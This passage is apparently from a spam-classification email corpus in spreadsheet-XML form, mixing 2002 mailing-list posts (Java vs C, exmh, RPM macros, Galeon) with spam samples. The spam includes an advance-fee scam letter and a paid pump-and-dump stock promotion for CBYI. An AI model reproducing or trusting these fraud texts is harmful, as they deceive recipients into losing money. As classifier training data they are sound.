 type=3D"hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D=
 "image" SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r3_c4.gif" ALT=3D=
 "Mixed Media Version" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td colspan=3D"3"&gt;
  &lt;form action=3D"http://www.webxperts.com/webxflyer2002.asp" method=3D=
 "post"&gt;&lt;input type=3D"hidden" name=3D"email" value=3D=
 "zzzz@spamassassin.taint.org"&gt;&lt;input type=3D"hidden" name=3D"m" value=3D=
 "sept2002"&gt;&lt;input type=3D"hidden" name=3D"page" value=3D"flash"&gt;&lt;input type=3D=
 "hidden" name=3D"typeof" value=3D"homes and apartments"&gt;&lt;INPUT TYPE=3D"image" =
 SRC=3D"http://www.eluxmedia.com/forms/flyer2002_r3_c7.gif" ALT=3D"Flash =
 Version" &gt;&lt;/form&gt;
 &lt;/td&gt;
    &lt;td&gt;&lt;img src=3D"http://www.eluxmedia.com/forms/spacer.gif" width=3D"1" =
 height=3D"277" border=3D"0"&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"720"&lt;tr&gt;&lt;td&gt;&lt;br&gt;&lt;br&gt;&lt;hr align=3D"center"&gt;
 Your email address was obtained from a purchased list. You are receiving this =
 from Eluxmedia LLC, and are a part of their mailing list. If you wish to =
 unsubscribe from this list, please &lt;a href=3D=
 "http://www.eluxmedia.com/unsub/unsubscribe.asp"&gt;click here&lt;/a&gt; and enter =
 your name into the remove box.&lt;br&gt;&lt;br&gt;If you have previously unsubscribed and =
 are still receiving this message, you may email our &lt;a href=3D=
 "mailto:solutions@eluxmedia.com"&gt;Abuse Control Center&lt;/a&gt;.&lt;/font&gt;&lt;hr align=3D=
 "center"&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;  
 --1d9d507a-d864-478d-ba24-917611e50332--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Why is it so hard to get a cab in San Francisco?
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://boingboing.net/#85519806
 Date: Not supplied
 A San Francisco cabbie -- generally a well-educated and firm-opinion-holding 
 class of person -- has an essay about a subject near and dear to my 
 (non-car-owning) heart: Why is it so damned hard to get a cab in San Francisco? 
     In fact, no cab company ever tells a driver to pick up anyone. When you 
     phone a cab firm in San Francisco, your call is treated not as an order, 
     not as a binding oral contract, but simply as a request... 
     So, why don't cab companies ensure that we pick you up on time-or at all? 
     In a nutshell, labor law states that if a cab company actually commands a 
     driver to carry out a specific action, that constitutes an 
     employer-employee relationship. But if a company farms its work out to 
     independent contractors, it can rid itself of costly expenses such as 
     disability and social security taxes. It also means that the contractor 
     drivers can't unionize.  
 Link[1] Discuss[2] (_via CamWorld[3]_)
 [1] http://www.bradnewsham.com/articles/why_so_hard.shtml
 [2] http://www.quicktopic.com/boing/H/eXFeCJHgnP4
 [3] http://www.bradnewsham.com/articles/why_so_hard.shtml
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;snip&gt;
 Misc rants about finding jobs, java vs C, what makes a good programmer, etc.
 &lt;/snip&gt;
 Okay, hmm, I thought twice about this, but what the hey, jobs are hard to
 come by. There's a company hiring in Mountain View, looking for a few good
 hackers, no Java, no GUI, not even C++ -- just C and Linux and networking
 and good old stuff like that. They just raised a wad of money and they're
 looking for a few "really good programmers", says the CTO. I know him --
 very smart guy. Drives too fast, though, for what that's worth.
 Joe Bob says "check it out". I'd be happy to pass on your resume, or you can
 send it straight to them. Probably won't matter if I pass it on, since I
 don't know you guys anyway...
 http://www.netli.com
 -- Sherry.
 &gt; -----Original Message-----
 &gt; From: Joseph S. Barrera III [mailto:joe@barrera.org]
 &gt; Sent: Tuesday, August 27, 2002 8:58 AM
 &gt; To: Adam L. Beberg
 &gt; Cc: fork@spamassassin.taint.org
 &gt; Subject: Re: Java is for kiddies
 &gt; 
 &gt; 
 &gt; Adam L. Beberg wrote:
 &gt;  &gt;&gt;&gt; Forwarding me stuff from a list is hardly handing me a job.
 &gt;  &gt;&gt;
 &gt;  &gt;&gt; I was talking about the open reqs at Kana (the company I 
 &gt; work for).
 &gt;  &gt;&gt;  Oh, but programming in Java is beneath you.
 &gt;  &gt;
 &gt;  &gt; Nope just lacking years and years of it. For some silly 
 &gt; reason people
 &gt;  &gt; always want things to be reliable, fast, and 
 &gt; cross-platform so all my
 &gt;  &gt; employers have forced me to code in C :)
 &gt; 
 &gt; C is more reliable than Java??
 &gt; 
 &gt; As for cross-platform, C exists on more platforms, but a Java program
 &gt; is much easier to move from one platform to another. So I'm not sure
 &gt; what you mean.
 &gt; 
 &gt; I'm not trying to fight a language war, but I'm puzzled by the depth
 &gt; of your anti-Java hatred.
 &gt; 
 &gt;  &gt; I know lots of high school
 &gt;  &gt; kiddies with plenty of Java tho, not having to teach people about
 &gt;  &gt; pointers or optimization or anything shaves years off the 
 &gt; coder boot
 &gt;  &gt; time. I'll send them your way when they graduate.
 &gt; 
 &gt; Pointers. So a language has to have pointers to be real? And 
 &gt; references
 &gt; don't count, I gather. What's so great about pointers? Why do you
 &gt; miss them? If your doing embedded stuff, fine, yes, you need the
 &gt; performance and control over memory that C provides. Probably.
 &gt; But if your implementing tier N-1 of a tier N system, and pounding
 &gt; against a database, then Java is OFTEN a very reasonable choice.
 &gt; Especially if you want that system to run without leaking memory.
 &gt; 
 &gt; Optimization. Who says you can't optimize Java? I can and have,
 &gt; and there are good tools that allow you to do it (I use OptimizeIt).
 &gt; But usually I find myself optimizing (reducing) database accesses
 &gt; instead. I sped one part of the system up by a factor of ten by
 &gt; grouping more operations into fewer transactions.
 &gt; 
 &gt; But this is beside the point. If you have decent C++ experience, and
 &gt; have poked around in Java, you should be able to convince most
 &gt; employers that you can be trusted writing Java. That's what I did --
 &gt; I mean, I joined Kana from Microsoft, and I didn't exactly write
 &gt; a lot of Java code at Microsoft.
 &gt; 
 &gt;  &gt; I'm not displeased you're trying to help, just frustrated that
 &gt;  &gt; employers can demand such rediculous combinations of skills with
 &gt;  &gt; insane years of experience.
 &gt; 
 &gt; I don't think I've ever interviewed at a place where I actually
 &gt; met all the prerequisites. Do you just give up when you don't?
 &gt; 
 &gt;  &gt; Interview tommorow with Kodak, doing I have no idea what as the
 &gt;  &gt; recruiter isnt even sure, but cross your fingers it wont require 10
 &gt;  &gt; years of Java and 5 years of Windows/IA-64's device driver 
 &gt; experience
 &gt;  &gt; (both common requirements).
 &gt; 
 &gt; I wish you best of luck, and I apologies for being a bitch.
 &gt; But God DAMN, you piss me off sometimes. My son occasionally
 &gt; displays your "can't-do" attitude and I do my damnest to
 &gt; get him to reverse course.
 &gt; 
 &gt; - Joe
 &gt; 
 &gt; 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] galeon and keyboard focus...
</t>
  </si>
  <si>
    <t xml:space="preserve">I get a different effect. I open new links in a tab, and they "open in the 
 background" or the current page still remains selected. Unfortunately the 
 other tab gets the focus. 
 The same happens with pages (re)loading in other tabs -&gt; the current tab loses 
 the keyboard focus which can be very annoying when filling in forms or even 
 when scrolling using the mouse-wheel.
 Donncha.
 On Friday 09 August 2002 14:21, kevin lyda wrote:
 &gt; ok, in a galeon browser window i open a new window by middle-clicking
 &gt; a link.  the window comes up under my mouse.  however, keys i type go to
 &gt; the first window.  anyone else have this problem, and did they solve it?
 &gt; i use sawfish as my wm with sloppy focus.
 &gt;
 &gt; kevin
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Giant Congo hydroelectric project is a 'betrayal'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8391026,1440/
 Date: Not supplied
 Campaigners say this and other mega-projects renege on promises made by African 
 leaders at the World Summit in Johannesburg
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG-Social] urgent assistance
</t>
  </si>
  <si>
    <t xml:space="preserve">ATTN:
 I am Edward Mulete JR. the son of Mr. 
 STEVE MBEKI MULETE from Zimbabwe. I am sorry this mail
 Will surprise you, though we do not know, my mother Mrs. Clara 
 Got your contact through her private search.
 Due to the current war against white farmers in
 Zimbabwe and the support of President Robert Mugabe to
 Claim all white owned farms in our country to gain
 Favor for re-election.
 All white farmers were asked to
 Surrender their farms to the government for
 Re-distribution and infact to his political party
 Members and my father though black was the treasury
 of the farmers association and a strong member of an
 Opposition party that did not support the president
 Idea. He then ordered his party members and the police
 Under his pay row to invade my father's farm and burn
 Down everything in the farm. They killed my
 Father and took away a lot of items from his farm.
 After the death of my father, our local pastor and a
 Close friend of my father handed us over will
 Documents with instructions from my father that we
 Should leave Zimbabwe incase anything happen to him. The will 
 Documents has a certificate of deposit, confirming a deposit
 Kept in custody for us in a security company unknown
 To the company that the content is money hence it was deposited as 
 Personal belongings and ensure that we do not remain here as we could
 Easily be found by his enemies. The total amount is
 US$21.5M.We are therefore soliciting for
 Your assistance to help us move the fund out of
 Zimbabwe, as our fate and future is far from
 reality, hence this mail to you. The president's present ban of
 International Press into Zimbabwe and the drop from office of the 
 Finance Minister to avoid giving white farmers fund Transfer
 Clearance above US$1M is just a few of the
 Unthinkable things he is committing in my Country.
 I have tried to reach my father's close friend Mr.
 John Casahans from Australia also a farmer who was
 Leaving in Zimbabwe with us but left with his family
 Late last year following this ugly development to no
 Avail.
 Should you be interested to help us, contact me
 Immediately via email for easy communication and I
 Will furnish you with the time frame and modalities of
 the transaction. We have concluded a wonderful plan of 
 Caring out the transfer within two weeks. Please note that 
 This transaction is100% confidential and risk free and will 
 Not endanger you or us in any way. We have resolved to give you 20%
 Of the total sum upon confirmation of the fund in any
 Account of your choice were the incident of taxation
 will not take much tool on the money and we look
 Forward to coming over to your country to invest our
 Share and settle there. I will a private
 Phone so that our conversation can be
 100% confidential.
 Please do not use the reply button, reply only to 
 Edmulete7@netscape.net Please take note.
 God bless you indeed as you help yourself and us.
 Mr. EDWARD MULETE
 -- 
 Irish Linux Users' Group Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: FW: Washington wire
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;TITLE&gt;&lt;/TITLE&gt;&lt;META http-equiv=3D=22Content-Type=22 content=3D=22=
 text/html; charset=3Dwindows-1252=22&gt;&lt;STYLE&gt;A:link =7BTEX-DECORATION: none=7D=
 A:active =7BTEXT-DECORATION: none=7DA:visited =7BTEXT-DECORATION: none=7DA:h=
 over =7BCOLOR: =230033ff; TEXT-DECORATION: underline=7D&lt;/STYLE&gt;&lt;META conten=
 t=3D=22MSHTML 6.00.2713.1100=22 name=3D=22GENERATOR=22&gt;&lt;/HEAD&gt;
 &lt;BODY text=3D=22=23000000=22 vLink=3D=22=230033ff=22 link=3D=22=230033ff=22 bgColor=
 =3D=22=23CCCC99=22&gt;&lt;TABLE borderColor=3D=22=23660000=22 cellSpacing=3D=220=22 cellP=
 adding=3D=220=22 border=3D=220=22 width=3D=22100%=22&gt;&lt;TR&gt;&lt;TD bgColor=3D=22=23CCCC99=22=
  valign=3D=22top=22 colspan=3D=222=22 height=3D=2227=22&gt;
 &lt;font size=3D=226=22 face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660=
 000=22&gt;
 &lt;b&gt;OTC&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694f=22&gt;=
 &lt;font size=3D=225=22 face=3D=22Times New Roman, Times, serif=22 color=3D=22=23FF=
 FFFF=22&gt;
 &lt;b&gt;&amp;nbsp;Newsletter&lt;/b&gt;&lt;/font&gt;&lt;/TD&gt;&lt;TD height=3D=222=22 bgcolor=3D=22=236a694=
 f=22&gt;&lt;div align=3D=22right=22&gt;&lt;font color=3D=22=23FFFFFF=22&gt;
 &lt;b&gt;Discover Tomorrow's Winners&amp;nbsp;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD =
 height=3D=2225=22 colspan=3D=222=22 bgcolor=3D=22=23CCCC99=22&gt;&lt;table width=3D=22100%=
 =22 border=3D=220=22 cellspacing=3D=220=22 cellpadding=3D=225=22&gt;&lt;tr&gt;&lt;td valign=3D=22=
 middle=22 height=3D=222=22&gt;&lt;table width=3D=22300=22 border=3D=221=22 cellspacing=3D=
 =220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22 bgcolor=3D=22=23EBEDCB=22=
  height=3D=225=22 align=3D=22center=22&gt;&lt;tr&gt;&lt;td valign=3D=22middle=22 height=3D=228=22=
 &gt;&lt;div align=3D=22center=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 color=3D=22=23660000=22 size=3D=
 =225=22&gt;
 &lt;b&gt;For Immediate Release&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;t=
 r&gt;&lt;td&gt;&lt;table width=3D=22100%=22 border=3D=221=22 cellspacing=3D=220=22 cellpaddin=
 g=3D=228=22 align=3D=22center=22 bgcolor=3D=22=23fafaf5=22 bordercolor=3D=22=23660000=
 =22&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23fafaf5=22 valign=3D=22top=22 height=3D=22453=22&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;Cal-Bay (Stock Symbol: CBYI)&lt;/b&gt;
 &lt;br&gt;Watch for analyst =22Strong Buy Recommendations=22 and several adviso=
 ry newsletters picking CBYI.  CBYI has filed to be traded on the OTCBB, =
 share prices historically INCREASE when companies get listed on this lar=
 ger trading exchange. CBYI is trading around 25 cents and should skyrock=
 et to =242.66 - =243.25 a share in the near future.&lt;br&gt;
 &lt;b&gt;&lt;i&gt;Put CBYI on your watch list, acquire a position TODAY.&lt;/i&gt;&lt;/b&gt;&lt;/f=
 ont&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;REASONS TO INVEST IN CBYI&lt;/b&gt;&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 A profitable company and is on track to beat ALL earnings estimates=21&lt;/=
 font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;=
 One of the FASTEST growing distributors in environmental &amp;amp; safety e=
 quipment instruments.&lt;/font&gt;
 &lt;li&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 color=3D=22=2300=
 0000=22 size=3D=22-1=22&gt;
 Excellent management team, several EXCLUSIVE contracts.  IMPRESSIVE cli=
 ent list including the U.S. Air Force, Anheuser-Busch, Chevron Refining =
 and Mitsubishi Heavy Industries, GE-Energy &amp;amp; Environmental Research.=
 &lt;/font&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;RAPIDLY GROWING INDUSTRY&lt;/b&gt;
 &lt;br&gt;Industry revenues exceed =24900 million, estimates indicate that the=
 re could be as much as =2425 billion from =22smell technology=22 by the end=
  of 2003.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face=3D=22Verdana, Arial, Helvetica, sans-serif=22 size=3D=22-1=22&gt;
 &lt;b&gt;=21=21=21=21=21CONGRATULATIONS=21=21=21=21=21&lt;/b&gt;&lt;br&gt;Our last recommendation t=
 o buy ORBT at =241.29 rallied and is holding steady at =243.50=21 Congratul=
 ations to all our subscribers that took advantage of this recommendation=
 .&lt;/font&gt;&lt;/p&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;
 &lt;p align=3D=22center=22&gt;&lt;font size=3D=22-1=22 face=3D=22Verdana, Arial, Helveti=
 ca, sans-serif=22 color=3D=22=23660000=22&gt;
 ALL removes HONORED. Please allow 7 days to be removed and send ALL add=
 resses to:
 &lt;font color=3D=23ff0000&gt;
 &lt;a href=3D=22mailto:goneforgood=40btamail.net.cn=22&gt;GoneForGood=40btamail.ne=
 t.cn
 &lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table width=3D=22100%=22 border=3D=221=22 c=
 ellspacing=3D=220=22 cellpadding=3D=220=22 bordercolor=3D=22=23660000=22&gt;&lt;tr&gt;&lt;td b=
 gcolor=3D=22=23660000=22 height=3D=228=22&gt;&amp;nbsp;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor=3D=22=23=
 FFFFCC=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspacing=3D=220=22 cellpad=
 ding=3D=224=22&gt;&lt;tr&gt;&lt;td&gt;
 &lt;font size=3D=22-2=22 face=3D=22Verdana, Arial, Helvetica, sans-serif=22&gt;
 Certain statements contained in this news release may be forward-lookin=
 g statements within the meaning of The Private Securities Litigation Ref=
 orm Act of 1995. These statements may be identified by such terms as =22e=
 xpect=22, =22believe=22, =22may=22, =22will=22, and =22intend=22 or similar terms=
 . We are NOT a registered investment advisor or a broker dealer. This is=
  NOT an offer to buy or sell securities. No recommendation that the secu=
 rities of the companies profiled should be purchased, sold or held by in=
 dividuals or entities that learn of the profiled companies. We were paid=
  =2427,000 in cash by a third party to publish this report. Investing in =
 companies profiled is high-risk and use of this information is for readi=
 ng purposes only. If anyone decides to act as an investor, then it will =
 be that investor's sole risk. Investors are advised NOT to invest withou=
 t the proper advisement from an attorney or a registered financial broke=
 r. Do not rely solely on the information presented, do additional indepe=
 ndent research to form your own opinion and decision regarding investing=
  in the profiled companies. Be advised that the purchase of such high-ri=
 sk securities may result in the loss of your entire investment.  Not int=
 ended for recipients or residents of CA,CO,CT,DE,ID, IL,IA,LA,MO,NV,NC,O=
 K,OH,PA,RI,TN,VA,WA,WV,WI. Void where prohibited.  The owners of this pu=
 blication may already own free trading shares in CBYI and may immediatel=
 y sell all or a portion of these shares into the open market at or about=
  the time this report is published.  Factual statements are made as of t=
 he date stated and are subject to change without notice.
 &lt;br&gt;Copyright c 2001&lt;/font&gt;&lt;hr width=3D=22100%=22 noShade size=3D=221=22&gt;&lt;/td=
 &gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;TR&gt;&lt;TD cols=
 pan=3D=222=22 height=3D=2231=22&gt;&lt;table width=3D=22100%=22 border=3D=220=22 cellspaci=
 ng=3D=220=22 cellpadding=3D=224=22&gt;&lt;tr&gt;&lt;td width=3D=2287%=22 height=3D=2221=22&gt;&lt;div =
 align=3D=22right=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;td width=3D=227%=22 he=
 ight=3D=2221=22&gt;
 &lt;font face=3D=22Arial, Helvetica, sans-serif=22 size=3D=226=22 color=3D=22=23FFF=
 FFF=22&gt;
 OTC&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;&lt;td width=3D=226%=22 height=3D=2221=22&gt;&lt;div align=3D=22le=
 ft=22&gt;
 &lt;font color=3D=22=23666666=22&gt;&amp;equiv;&lt;/font&gt;&lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/TD&gt;&lt;/=
 TR&gt;&lt;/TABLE&gt;&lt;/BODY&gt;&lt;/HTML&gt;
 ***
</t>
  </si>
  <si>
    <t xml:space="preserve">--Multipart_Tue_Sep_10_08:56:11_2002-1
 Content-Type: text/plain; charset=US-ASCII
 &gt; From: Hal DeVore &lt;haldevore@acm.org&gt;
 &gt; Sender: exmh-users-admin@example.com
 &gt; Date: Mon, 09 Sep 2002 22:06:58 -0500
 &gt; 
 &gt; 
 &gt; 
 &gt; &gt;&gt;&gt;&gt;&gt; On Mon, 9 Sep 2002, "Rick" == Rick Baartman wrote:
 &gt; 
 &gt;   Rick&gt; This is dangerous; I have to remember to re-scan each
 &gt;   Rick&gt; folder I enter. Is there a safeguard for this?
 &gt; 
 &gt; Nope.  Regenerate the cache in the script
 &gt; 
 &gt; 	for f in `folders -fast -r`
 &gt; 	do
 &gt; 		echo sorting $f ...
 &gt; 		sortm +$f
 &gt; 		scan `mhpath +`/$f/.xmhcache
 &gt; 	done
 &gt; 
 &gt; --Hal
 Here is the little script I run I run nightly from cron. It does a
 general tidying of things including sorting and updating the cache.
 I didn't write it and I'm afraid I have lost track of who did, but
 it's worked well for years. I run a similar one to update the glimpse
 indices nightly.
 R. Kevin Oberman, Network Engineer
 Energy Sciences Network (ESnet)
 Ernest O. Lawrence Berkeley National Laboratory (Berkeley Lab)
 E-mail: oberman@es.net			Phone: +1 510 486-8634
 --Multipart_Tue_Sep_10_08:56:11_2002-1
 Content-Type: application/octet-stream
 Content-Disposition: attachment; filename="swasort"
 Content-Transfer-Encoding: 7bit
 #!/bin/tcsh -f
 # 
 #  Sorts all folders
 #
 #  We don't want to sort the drafts folder (and the folders ~/Mail/.glimpse/)
 #
 #  default field to sort .: date
 #  default scan width ....: 100
 #
 set MH_DIR=/usr/local/nmh/bin
 set MAIL=/home/oberman/Mail
 # update $MAIL/.folders
 $MH_DIR/folders -fast -recurse -all &gt; $MAIL/.folders
 # thru all folders ...
 foreach i ( `cat $MAIL/.folders | grep -v \.glim | grep -v drafts` )
     # sort the stuff
     $MH_DIR/mh/sortm +$i -datefield date &gt;&amp; /dev/null
     # and update the cache
     $MH_DIR/scan +$i -width 100 &gt; $MAIL/$i/.xmhcache
 end
 --Multipart_Tue_Sep_10_08:56:11_2002-1--
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: rpm versioning done right?
</t>
  </si>
  <si>
    <t xml:space="preserve">Once upon a time, Daniel wrote :
 &gt; What do you pleople think of the strategy to put prerelease
 &gt; (alpha/beta/rc) information in the release field? The above example
 &gt; should then have 6.1-0alpha5 as %{version}-%{release} and when the final
 &gt; version was released it would have 6.1-1.
 Why not... it's just that sometimes it gets a bit more confusing in the
 spec file since you have to change the "Source:" as well as "%setup" to
 reflect the name changes. But it might also sometimes be even easier the
 way you suggest, if the entire package contains only references to the
 final version and that only the archive name has a "pr1" or "beta6" in it
 for example.
 Take for instance xmame : I've been packaging 0.61 pre-releases as
 "0.61-fr0.x" since the entire source has only "0.61" tags everywhere, no
 preversion tags whatsoever.
 Still, I don't think "Epoch:" is an evil hack although it's true that it
 may cause problems between distributions when used. Wanting to avoid it
 when possible is a good thing indeed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</si>
  <si>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--==_Exmh_-1913987426P
 Content-Type: text/plain; charset=us-ascii
 On Mon, 26 Aug 2002 20:00:36 +0200, Anders Eriksson &lt;aeriksson@fastmail.fm&gt;  said:
 &gt; I checked on a number of small messages in a big folder (~10000 
 &gt; msgs). The delay of the Next button has increased considerably:
 &gt; 
 &gt; 2.5-release: 350-450 msec
 &gt; latest cvs: 1000-12000 msec
 I'm not seeing a hit on 'next'. A quick "just pound on 'next' and watch the
 wall clock" test shows me able to go through 20 messages in under 5 seconds,
 so it's well under 250ms per switch, but I'm seeing a really piggy CPU spike
 (100% for a few seconds) in the 'flist' code.  Of course, it seems to be
 related to number-of-folders:
 [~] wc Mail/.folders
     131     131    1122 Mail/.folders
 It's particularly annoying because things just hose-and-hang for 10 seconds, so
 when it hits, you have a long latency before what you're doing actually
 happens...
 14:08:54 Background_DoPeriodic flist
 14:08:54 Flist_FindSeqs reset=0
 14:08:54 FlistFindStart reset=0 active=0
 14:08:56 Reading /home/valdis/Mail/exmh/.mh_sequences
 14:08:56 exmh has 1 msgs in unseen
 14:08:56 1 unseen message in 1 folder
 14:08:56 {In FlagInner up iconup labelup}
 14:08:56 {Setting flag glyph to iconup}
 14:08:56 {Set flag state to up}
 14:08:58 Reading /home/valdis/Mail/list-spams/.mh_sequences
 14:08:58 list-spams has 1 msgs in unseen
 14:08:58 2 unseen messages in 2 folders
 14:08:58 {In FlagInner up iconup labelup}
 14:09:02 Reading /home/valdis/Mail/trash/.mh_sequences
 14:09:02 trash has 2 msgs in pseq
 14:09:03 /home/valdis/Mail/xemacs/7508 not found
 14:09:03 /home/valdis/Mail/xemacs/7507 not found
 14:09:03 /home/valdis/Mail/xemacs/7508 not found
 14:09:03 /home/valdis/Mail/xemacs/7507 not found
 14:09:03 {pseq: 7506-7508 =&gt; 7506}
 14:09:03 Writing /home/valdis/Mail/xemacs/.mh_sequences
 14:09:03 xemacs has 1 msgs in pseq
 14:09:03 Flist_Done
 And it takes a hit even if there's no new mail:
 14:11:03 Background_DoPeriodic flist
 14:11:03 Flist_FindSeqs reset=0
 14:11:03 FlistFindStart reset=0 active=0
 14:11:12 Flist_Done
 14:11:12 Flist_FindSeqs end {9018315 microseconds per iteration}
 I'm perfectly willing to can-opener that code and see where the CPU is
 going, but only if nobody is slapping their forehead and mumbling about
 a brown-paper-bag bug... ;)
 -- 
 				Valdis Kletnieks
 				Computer Systems Senior Engineer
 				Virginia Tech
 --==_Exmh_-1913987426P
 Content-Type: application/pgp-signature
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.0.7 (GNU/Linux)
 Comment: Exmh version 2.5 07/13/2001
 iD8DBQE9anH1cC3lWbTT17ARAvzuAKDShPISux8PrLitv4WIzUiCxfj60gCgvEPy
 QnWKrjGimFVroJcIHICt2e4=
 =T3wR
 -----END PGP SIGNATURE-----
 --==_Exmh_-1913987426P--
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: Documentation about built-in RPM macros?
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; -----Original Message-----
 &gt; From: Ralf Ertzinger [mailto:ralf@camperquake.de]
 &gt; Sent: Thursday, August 15, 2002 2:53 PM
 &gt; To: rpm-zzzlist@freshrpms.net
 &gt; Subject: Re: Documentation about built-in RPM macros?
 &gt; 
 &gt; 
 &gt; Hi.
 &gt; 
 &gt; Dave Cridland &lt;dave@cridland.net&gt; wrote:
 &gt; 
 &gt; &gt; &gt; recommends *against* using '%configure' ("We will try to 
 &gt; support users
 &gt; &gt; &gt; who accidentally type the leading % but this should not be relied
 &gt; &gt; &gt; upon."), and yet
 &gt; 
 &gt; [snip]
 &gt; 
 &gt; &gt; They're just suggesting people use "./configure" instead.
 &gt; 
 &gt; No, they do not (what would be the use of that, anyway?). 
 &gt; They say that
 &gt; they will _try_ to eval macros even if the user forgot to pass the
 &gt; leading '%', but that this feature should not be relied upon.
 &gt; 
 Hmm.  1. The quote is not suggesting that people use './configure'.
 2. The quote is not saying that rpm will _try_ to eval macros even
 if the user forgot to pass the leading '%'.  It is saying the opposite:
 rpm will try to support users who "forgot" to _leave off_ the leading
 '%'.  That is what the documentation _says_, but rpm does not follow
 the documentation.  If you leave off the '%', then rpm will not eval
 the macro, at least for rpm 4.0.4.
 Confused?
 Anyway, back to my original problem: what about documentation for
 the macros '%post', '%postun', and '%files'?  Here's some of what
 I found "documented" in the the CHANGES file that 'rpm' includes:
 Line 46:
 	- macro for %files, always include %defattr(), redhat config
 only.
 Line 49:
 	- bail on %files macro.
 Hmm.  So, there is no %files macro?
 Line 172-174:
 	- add "rpmlib(ScriptletInterpreterArgs)" to track
 	    %post -p "/sbin/ldconfig -n /usr/lib"
 	  incompatibilities.
 I'm unable to find a corresponding description for %postun, but it
 appears to work just the same.  The important things to remember are:
   1. Don't forget the double-quotes around the -p argument string.  If
      you leave them off, you'll get the cryptic error message:
      error: line #: Package does not exist: %post -p /sbin/ldconfig -n
 /usr/lib
   2. This only works with RPM 4.0.3 or later.
 &gt; -- 
 &gt; On the first day of Christmas my true love sent to me
 &gt;        A badly configured newsreader
 &gt; 
 &gt; _______________________________________________
 &gt; RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 &gt; http://lists.freshrpms.net/mailman/listinfo/rpm-list
 &gt; 
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Property rights in the 3rd World (De Soto's Mystery of Capital)
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of
 Dave
 &gt; Long
 &gt; Sent: Thursday, August 22, 2002 11:12 AM
 &gt; To: fork@spamassassin.taint.org
 &gt; Subject: RE: The Curse of India's Socialism
 &gt; 
 &gt; 
 &gt; 
 &gt; When I'd read that "getting legal title
 &gt; can take 20 years", when I believe that
 &gt; 1 year ought to be more than sufficient,
 &gt; (and helped by the Cairo reference) I'd
 &gt; assumed that we were talking about the
 &gt; urban poor.
 &gt; 
 &gt; If I see people living in mansions, or
 &gt; even in suburban subdivisions, I assume
